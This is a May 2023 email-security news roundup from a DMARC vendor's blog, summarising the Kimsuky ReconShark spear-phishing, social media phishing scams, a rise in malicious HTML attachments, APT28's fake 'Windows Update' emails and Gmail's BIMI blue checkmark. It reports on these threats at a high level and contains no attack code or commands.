---
title: "Kimsuky Spear-Phishing Worldwide, 2023 Social Phishing Threat, Phishing HTML Doubles | DMARC Report"
description: "This week"
image: "https://dmarcreport.com/og/blog/kimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles.png"
canonical: "https://dmarcreport.com/blog/kimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles/"
---

Quick Answer

This week's latest \[email security\](https://dmarcreport.com/blog/why-email-security-matters-and-how-to-get-it-right/) update brings you the top email security news of the latest phishing campaigns and security features. Let's take a look.

Share 

[ ](https://www.linkedin.com/sharing/share-offsite/?url=undefined%2Fblog%2Fkimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles%2F "Share on LinkedIn") [ ](https://twitter.com/intent/tweet?text=Kimsuky%20Spear-Phishing%20Worldwide%2C%202023%20Social%20Phishing%20Threat%2C%20Phishing%20HTML%20Doubles&url=undefined%2Fblog%2Fkimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles%2F "Share on X/Twitter") [ ](https://www.facebook.com/sharer/sharer.php?u=undefined%2Fblog%2Fkimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles%2F "Share on Facebook") [ ](https://reddit.com/submit?url=undefined%2Fblog%2Fkimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles%2F&title=Kimsuky%20Spear-Phishing%20Worldwide%2C%202023%20Social%20Phishing%20Threat%2C%20Phishing%20HTML%20Doubles "Share on Reddit") [ ](mailto:?subject=Kimsuky%20Spear-Phishing%20Worldwide%2C%202023%20Social%20Phishing%20Threat%2C%20Phishing%20HTML%20Doubles&body=Check out this article: undefined%2Fblog%2Fkimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles%2F "Share via Email") 

![Kimsuky Spear-Phishing Worldwide, 2023 Social Phishing Threat, Phishing HTML Doubles](https://media.mailhop.org/dmarcreport/images/2022/04/dmarc-alignment-6379.jpg) 

This week’s latest [email security](https://dmarcreport.com/blog/why-email-security-matters-and-how-to-get-it-right/) update brings you the top email security news of the latest \*\*phishing campaigns and security features. Let’s take a look.

> Domain spoofing is trivially easy without DMARC enforcement, says Brad Slavin, General Manager of DuoCircle. Anyone can send email that looks like it comes from your domain. DMARC with p=reject is the only way to tell receiving servers to block unauthorized senders completely.

\_According to the [FBI’s 2022 Internet Crime Report (IC3)](https://www.ic3.gov/Media/PDF/AnnualReport/2022IC3Report.pdf), 300,497 US-based victims reported phishing incidents in a single year, and Business Email Compromise (BEC) caused more than $2.7 billion in direct losses.

## North Korean Threat Actor Group Kimsuky Initiates a Worldwide Spear-Phishing Campaign

Kimsuky, a North Korean \*\*state-sponsored threat actor group, initiated a new spear phishing campaign with a malware component called ReconShark .

Researchers at SentinelOne published an [advisory](https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/) highlighting that threat actors are deploying ReconShark through \*\*targeted spear phishing campaigns. These ReconShark phishing emails contain OneDrive links that download multiple documents on the victim’s devices, activating **harmful macros**.

The threat actors abuse the names of real individuals in these emails to lure the targets in, so they open these malicious links. The downloaded files **triggered** [Microsoft Office macros](https://www.empowerit.com.au/blog/cyber-security/office-macros-disable/) and carried out the surveillance, just like Kimsuky’s BabyShark malware. ReconShark is a significant threat with the ability to exfiltrate deployed \*\*detection mechanisms and hardware info and allows Kimsuky to carry out subsequent precious attacks.

The [malware](https://www.infosecurity-magazine.com/news/kekw-malware-python-packages/) stores all information in \*\*string variables and shares it with a C2 (Command and Control) server, and can install additional payloads via malicious scripts or DLL (Dynamic Link Library) files.

## Social Media Phishing Emerges as a Significant Cybersecurity Threat in 2023

Threat actors are targeting social media applications for [phishing](https://dmarcreport.com/blog/phishing-smishing-vishing-everything-you-need-to-know/), making social media phishing a \*\*significant threat for 2023 and beyond.

The FTC (Federal Trade Commission) shared a [report](https://www.ftc.gov/news-events/news/press-releases/2023/02/new-ftc-data-show-consumers-reported-losing-nearly-88-billion-scams-2022) revealing that individuals lost nearly $8.8 billion to scams in 2022, a 30% increase from 2021\. The trend continued and has seen a significant spike into 2023, so individuals must stay vigilant.

Threat actors employ \*\*multiple tactics to target innocent individuals. The previous year saw the use of phishing emails impersonating LinkedIn, offering fake job offers, threat actors approaching targets with malicious direct messages, cryptocurrency scam emails offering free [crypto giveaways](https://www.helpnetsecurity.com/2022/09/19/crypto-giveaway-scams-continue-to-escalate/), fraudulent quizzes on Facebook, and customer support scams, communicating with individuals via \*\*online chat rooms to target personal information and financial details.

![Create dmarc record](https://media.mailhop.org/dmarcreport/images/2023/05/create-dmarc-record-3.jpg) 

It is recommended to \*\*stay away from unsolicited emails and social media conversations. You should refrain from sharing personal information on [social media](https://thehackernews.com/2023/05/meta-uncovers-massive-social-media.html) and \*\*double-check all URLs (Uniform Resource Locator) before opening it.

## The Proportion of Malicious HTML Attachments in Phishing Emails Doubles in One Year, Reveals Threat Analysis

Did you know that the volume of emails with \*\*malicious HTML (HyperText Markup Language) has doubled from last year?

Barracuda released a new [report](https://blog.barracuda.com/2023/05/03/threat-spotlight-malicious-html-attachments-doubles/) highlighting that the HTML attachments in phishing emails doubled from last year, reaching 46%, a \*\*significant spike from the 21% of the previous year.

HTML files are becoming a popular phishing tool for [credential theft](https://www.securitymagazine.com/articles/95302-half-of-us-companies-hit-with-privileged-credential-theft-insider-threats-in-last-year) and email threats, redirecting innocent individuals via \*\*JavaScript libraries that take these individuals to phish websites or malicious content. The threat actors utilize these websites to steal unsuspecting users’ **login credentials**. However, this is not all. Threat actors use HTML files embedded with sophisticated malware, potent scripts, and executables to do their dirty bidding.

Individuals and organizations need to \*\*keep an eye out for these and get the proper security in place to stay protected.

## APT28 Focuses on Ukrainian Government Entities Using Deceptive “Windows Update” Emails

The CERT-UA (Computer Emergency Response Team of Ukraine) [issued](https://cert.gov.ua/article/4492467) a warning of cyberattacks by Russian nation-state threat actors targeting its **governing bodies**.

The CERT-UA released a blog outlining that the threat actor group \*\*ATP28 is behind the new email campaign. Also known as Fancy Bear, Frozen Lake, Iron Twilight, and Forest Blizzard, the ATP28 threat actor group sends email messages that contain the subject line “Windows Update.” These malicious emails contain instructions in the Ukrainian language that run a \*\*PowerShell command instead of a security update.

The script executes an additional PowerShell script that collects all \*\*basic system information and then exfiltrates the details to a Mocky API (Application Programming Interface) using [HTTP requests](https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy). To make the campaign more convincing, these emails impersonate the system administrators of the targeted government agency and use \*\*fake MS Outlook email accounts to do so.

Organizations are advised to restrict user abilities to run PowerShell scripts and to \*\*monitor all network connections to Mocky API.

![What is dmarc 6307](https://media.mailhop.org/dmarcreport/images/2023/05/what-is-dmarc-6307-1.jpg) 

## Gmail Introduces the Blue Checkmark Feature to Strengthen Email Security, Announced by Google

Google [announced](https://workspaceupdates.googleblog.com/2023/05/expanding-gmail-security-BIMI.html?utm%5Fsource=twitter&utm%5Fmedium=unpaidsoc&utm%5Fcampaign=FY23-Q2-Gmail%5FBlog%5FProduct-Education&utm%5Fcontent=-&utm%5Fterm=-&utm%5Fpageloadtype=inline%5Flink) a new blue tick mark feature for its Gmail users. A blue tick will now appear as a small icon \*\*next to the logo of the organization sending the email.

_The blue tick will be a part of authentication with [BIMI](https://dmarcreport.com/blog/the-role-of-bimi-in-the-fight-against-email-fraud-and-scam/) (Brand Indicators for Message Identification) and will be \*\*available to all Google Workspace, legacy G Suite Basic and Business customers, and personal Google account users._ The blue tick has been seen on many other channels and social media websites such as Instagram and Twitter to set apart \*\*verified profiles and comes as an added security feature that will allow individuals to distinguish legitimate emails from malicious ones, boosting email security.

Furthermore, the blue tick will promote \*\*strong email authentication as a part of BIMI, urging organizations and businesses to implement [DMARC](https://dmarcreport.com/) (Domain-based Message Authentication, Reporting, and Conformance) and BIMI.

Google’s blue checkmark feature for Gmail was initiated on 3 May 2023 and will roll out completely in the coming days.

## Topics

[ email security ](/tags/email-security/)[ News ](/tags/news/) 

![Vasile Diaconu](https://media.mailhop.org/dmarcreport/images/team/vasile-diaconu.jpg) 

[ Vasile Diaconu ](/authors/vasile-diaconu/) 

Operations Lead

Operations Lead at DuoCircle. Runs project management, developer coordination, and technical support execution for DMARC Report.

[LinkedIn Profile →](https://www.linkedin.com/in/vasile-diaconu/) 

## Take control of your DMARC reports

Turn raw XML into actionable dashboards. Start free - no credit card required.

[Start Free Trial](https://app.dmarcreport.com/) [Check Your DMARC Record](/tools/dmarc-checker/) 

## Related Articles

[  Foundational 4m  5 Mind-Boggling Phishing Attacks in Australia 2023!  Feb 8, 2024 ](/blog/5-mind-boggling-phishing-attacks-in-australia-2023/)[  Foundational 4m  Akira flaunts victims, Idaho targets orthodontist, AI granny protects  Nov 22, 2024 ](/blog/akira-flaunts-victims-idaho-targets-orthodontist-ai-granny-protects/)[  Foundational 4m  Alternatives to DMARCLY's Blog Section for Learning About Email Authentication and DMARC  Nov 6, 2023 ](/blog/alternatives-to-dmarclys-blog-section-for-learning-about-email-authentication-and-dmarc/)[  Foundational 4m  Ambient Light Spying, Cybersecurity Prices Drop, Euro 2024 Threats  Jul 10, 2024 ](/blog/ambient-light-spying-cybersecurity-prices-drop-euro-2024-threats/)

```json
{"@context":"https://schema.org","@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com","logo":{"@type":"ImageObject","url":"https://dmarcreport.com/images/dmarcreport-logo.png"},"description":"DMARC reporting and email authentication management. Monitor aggregate and forensic DMARC reports, analyze authentication results, and enforce DMARC policies across all your domains.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"sameAs":["https://www.wikidata.org/wiki/Q138898167","https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.g2.com/products/dmarc-report/reviews","https://github.com/duocircle","https://www.crunchbase.com/organization/duocircle-llc","https://www.trustradius.com/products/duocircle/reviews"],"aggregateRating":{"@type":"AggregateRating","ratingValue":"4.8","reviewCount":"470","bestRating":"5","worstRating":"1","url":"https://www.g2.com/products/dmarc-report/reviews"},"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://dmarcreport.com/support/"},"knowsAbout":["DMARC","DMARC Reporting","DMARC Aggregate Reports","DMARC Forensic Reports","Sender Policy Framework","DKIM","Email Authentication","Email Security","DNS Management","Email Deliverability"]}
```

```json
{"@context":"https://schema.org","@type":"WebSite","name":"DMARC Report","url":"https://dmarcreport.com","description":"DMARC reporting and email authentication management. Monitor aggregate and forensic DMARC reports, analyze authentication results, and enforce DMARC policies across all your domains.","publisher":{"@type":"Organization","name":"DMARC Report","url":"https://dmarcreport.com","logo":{"@type":"ImageObject","url":"https://dmarcreport.com/images/dmarcreport-logo.png"},"description":"DMARC reporting and email authentication management. Monitor aggregate and forensic DMARC reports, analyze authentication results, and enforce DMARC policies across all your domains.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]}}}
```

```json
[{"@context":"https://schema.org","@type":"BlogPosting","headline":"Kimsuky Spear-Phishing Worldwide, 2023 Social Phishing Threat, Phishing HTML Doubles","description":"This week's latest email security update brings you the top email security news of the latest phishing campaigns and security features. Let's take a look.","url":"https://dmarcreport.com/blog/kimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles/","datePublished":"2023-05-08T06:47:17.000Z","dateModified":"2026-04-16T15:53:43.000Z","dateCreated":"2023-05-08T06:47:17.000Z","author":{"@type":"Person","@id":"https://dmarcreport.com/authors/vasile-diaconu/#person","name":"Vasile Diaconu","url":"https://dmarcreport.com/authors/vasile-diaconu/","jobTitle":"Operations Lead","description":"Vasile Diaconu is the Operations Lead at DuoCircle, the company behind DMARC Report and AutoSPF. He coordinates between engineering, product, and technical support - running project management, interfacing with developers on customer-reported issues, and making sure work that comes in through the support channel actually gets closed out. Vasile sits at the intersection of customer feedback and engineering execution, giving him a direct view of which email authentication problems customers hit most often in production.","image":"https://media.mailhop.org/dmarcreport/images/team/vasile-diaconu.jpg","knowsAbout":["SaaS Operations","Technical Support Coordination","Customer Issue Resolution","Engineering Program Management","Deployment Operations"],"worksFor":{"@type":"Organization","name":"DMARC Report","url":"https://dmarcreport.com"},"sameAs":["https://www.linkedin.com/in/vasile-diaconu/"]},"publisher":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com","logo":{"@type":"ImageObject","url":"https://dmarcreport.com/images/dmarcreport-logo.png"},"description":"DMARC reporting and email authentication management. Monitor aggregate and forensic DMARC reports, analyze authentication results, and enforce DMARC policies across all your domains.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"sameAs":["https://www.wikidata.org/wiki/Q138898167","https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.g2.com/products/dmarc-report/reviews","https://github.com/duocircle","https://www.crunchbase.com/organization/duocircle-llc","https://www.trustradius.com/products/duocircle/reviews"],"aggregateRating":{"@type":"AggregateRating","ratingValue":"4.8","reviewCount":"470","bestRating":"5","worstRating":"1","url":"https://www.g2.com/products/dmarc-report/reviews"},"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://dmarcreport.com/support/"},"knowsAbout":["DMARC","DMARC Reporting","DMARC Aggregate Reports","DMARC Forensic Reports","Sender Policy Framework","DKIM","Email Authentication","Email Security","DNS Management","Email Deliverability"]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://dmarcreport.com/blog/kimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles/"},"articleSection":"foundational","keywords":"email security, News","wordCount":901,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/dmarcreport/images/2022/04/dmarc-alignment-6379.jpg","caption":"Kimsuky Spear-Phishing Worldwide, 2023 Social Phishing Threat, Phishing HTML Doubles","width":900,"height":600},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}}]
```

```json
{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://dmarcreport.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://dmarcreport.com/blog/"},{"@type":"ListItem","position":3,"name":"Foundational","item":"https://dmarcreport.com/foundational/"},{"@type":"ListItem","position":4,"name":"Kimsuky Spear-Phishing Worldwide, 2023 Social Phishing Threat, Phishing HTML Doubles","item":"https://dmarcreport.com/blog/kimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles/"}]}
```